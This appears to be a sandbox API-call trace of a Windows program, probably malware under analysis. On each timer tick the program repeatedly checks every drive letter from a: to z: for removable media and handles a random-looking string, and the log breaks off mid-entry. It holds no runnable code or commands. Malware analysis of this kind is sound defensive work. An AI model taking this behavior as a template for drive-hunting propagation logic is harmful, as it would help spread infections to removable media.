[0219.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.047] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.047] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.047] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.047] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.047] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.047] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.047] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0219.047] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.047] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0219.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0219.048] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.048] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0219.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.048] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.049] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.049] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.049] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.049] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.050] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.050] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.050] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.050] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.050] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.050] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.051] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.052] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.052] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.052] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.052] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.052] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.053] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.053] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.053] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.053] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.053] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.054] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.054] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.055] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.055] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.056] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.056] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.056] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0219.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.057] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0219.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.057] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.057] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.057] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.057] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.058] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.058] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.058] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.058] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.059] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.059] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.059] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.059] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.059] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.060] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.060] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.060] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.060] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.061] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.061] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.061] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.061] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.061] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.062] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.062] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.062] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.062] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.063] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.063] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0219.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0219.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.064] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0219.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0219.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0219.065] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.065] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.065] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0219.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0219.065] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0219.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0219.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0219.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.066] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.066] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.066] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.066] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.066] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.067] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.067] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.067] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.067] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.067] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.068] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.068] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.068] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.068] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.068] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.068] GetDriveTypeW 